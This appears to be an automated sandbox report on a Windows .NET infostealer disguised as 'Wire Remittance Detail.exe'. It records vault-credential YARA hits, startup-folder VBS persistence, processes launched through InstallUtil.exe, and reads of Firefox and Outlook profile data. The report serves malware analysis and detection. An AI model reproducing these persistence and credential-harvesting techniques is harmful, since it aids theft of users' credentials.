                    Source: Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameZedcnnrkti.exe6 vs Wire Remittance Detail.exe
                    Source: Wire Remittance Detail.exe, 00000000.00000002.1105598136.0000000005BC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Wire Remittance Detail.exe
                    Source: Wire Remittance Detail.exe, 00000000.00000002.1106231956.0000000005E50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Wire Remittance Detail.exe
                    Source: Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004121000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBjrpmivvqlf.dll" vs Wire Remittance Detail.exe
                    Source: Wire Remittance Detail.exe, 00000000.00000002.1083367719.0000000003041000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Wire Remittance Detail.exe
                    Source: Wire Remittance Detail.exe, 00000000.00000002.1101766073.00000000041C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Wire Remittance Detail.exe
                    Source: Wire Remittance Detail.exe, 00000000.00000002.1104044099.00000000058B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameBjrpmivvqlf.dll" vs Wire Remittance Detail.exe
                    Source: Wire Remittance Detail.exe, 00000000.00000002.1081981434.00000000013CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Wire Remittance Detail.exe
                    Source: Wire Remittance Detail.exe, 00000000.00000002.1101766073.00000000044AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamec5ea4fda-43b2-4fc0-8a8b-07958574f042.exe4 vs Wire Remittance Detail.exe
                    Source: Wire Remittance Detail.exe, 00000000.00000002.1083367719.0000000003434000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamec5ea4fda-43b2-4fc0-8a8b-07958574f042.exe4 vs Wire Remittance Detail.exe
                    Source: Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Wire Remittance Detail.exe
                    Source: Wire Remittance Detail.exeBinary or memory string: OriginalFilenameZedcnnrkti.exe6 vs Wire Remittance Detail.exe
                    Source: Wire Remittance Detail.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: 0.2.Wire Remittance Detail.exe.44aee70.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 5.2.AssemblyFullName.exe.4337120.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 5.2.AssemblyFullName.exe.4337120.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Wire Remittance Detail.exe.44aee70.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: Wire Remittance Detail.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: AssemblyFullName.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Wire Remittance Detail.exe, ViewerReceiver.csCryptographic APIs: 'CreateDecryptor'
                    Source: AssemblyFullName.exe.0.dr, ViewerReceiver.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.Wire Remittance Detail.exe.42b3098.5.raw.unpack, ViewerReceiver.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.Wire Remittance Detail.exe.44aee70.1.raw.unpack, RsYAkkzVoy.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Wire Remittance Detail.exe.44aee70.1.raw.unpack, Kqqzixk.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Wire Remittance Detail.exe.44aee70.1.raw.unpack, xROdzGigX.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Wire Remittance Detail.exe.44aee70.1.raw.unpack, ywes.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Wire Remittance Detail.exe.44aee70.1.raw.unpack, iPVW0zV.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                    Source: 0.2.Wire Remittance Detail.exe.44aee70.1.raw.unpack, 1Pi9sgbHwoV.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.Wire Remittance Detail.exe.44aee70.1.raw.unpack, YUgDfWK2g4.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Wire Remittance Detail.exe.44aee70.1.raw.unpack, YUgDfWK2g4.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 0.2.Wire Remittance Detail.exe.5e50000.11.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 0.2.Wire Remittance Detail.exe.5e50000.11.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 0.2.Wire Remittance Detail.exe.5e50000.11.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                    Source: 0.2.Wire Remittance Detail.exe.5e50000.11.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                    Source: 0.2.Wire Remittance Detail.exe.5e50000.11.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 0.2.Wire Remittance Detail.exe.5e50000.11.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 0.2.Wire Remittance Detail.exe.5e50000.11.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.Wire Remittance Detail.exe.5e50000.11.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.Wire Remittance Detail.exe.5e50000.11.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Wire Remittance Detail.exe.5e50000.11.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@8/3@2/2
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AssemblyFullName.vbsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AssemblyFullName.vbs"
                    Source: Wire Remittance Detail.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Wire Remittance Detail.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: Wire Remittance Detail.exeVirustotal: Detection: 54%
                    Source: Wire Remittance Detail.exeReversingLabs: Detection: 55%
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeFile read: C:\Users\user\Desktop\Wire Remittance Detail.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\Wire Remittance Detail.exe "C:\Users\user\Desktop\Wire Remittance Detail.exe"
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AssemblyFullName.vbs"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\AssemblyFullName.exe "C:\Users\user\AppData\Roaming\AssemblyFullName.exe"
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\AssemblyFullName.exe "C:\Users\user\AppData\Roaming\AssemblyFullName.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: Wire Remittance Detail.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Wire Remittance Detail.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                    Source: Wire Remittance Detail.exeStatic file information: File size 1129472 > 1048576
                    Source: Wire Remittance Detail.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x113200
                    Source: Wire Remittance Detail.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
